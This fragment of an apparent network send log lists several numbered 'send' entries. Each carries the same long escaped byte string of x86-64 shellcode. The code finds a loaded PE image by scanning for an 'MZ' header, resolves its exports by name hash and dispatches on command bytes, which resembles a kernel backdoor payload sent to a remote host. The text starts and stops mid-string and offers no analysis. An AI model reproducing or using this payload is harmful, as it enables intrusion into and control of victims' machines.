\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 4, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 6, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\